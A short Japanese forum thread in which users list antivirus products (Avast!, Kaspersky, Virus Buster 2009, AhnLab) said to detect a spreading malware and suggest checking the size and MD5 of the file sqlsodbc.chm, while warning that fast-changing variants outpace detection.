検出してくれるセキュリティソフトも追加しないか？
付け焼き刃だけど

　・Avast!
　・Kaspersky

>>994
こんな感じでいいのかな？

現時点で確認出来る対策ソフト　
・Avast!

・Kaspersky

　・ウイルスバスター2009

もかな

ソースネクストとかのはやばそうだなｗ

>>991
sqlsodbc.chmのファイルサイズとMD5をチェック

どんどん亜種が出てるみたいから対策ソフトも追いついてない

>>995

※亜種の進化が速いため過信は禁物

とか書いたほうがいいかも

アンラボも対応済みらしいけど・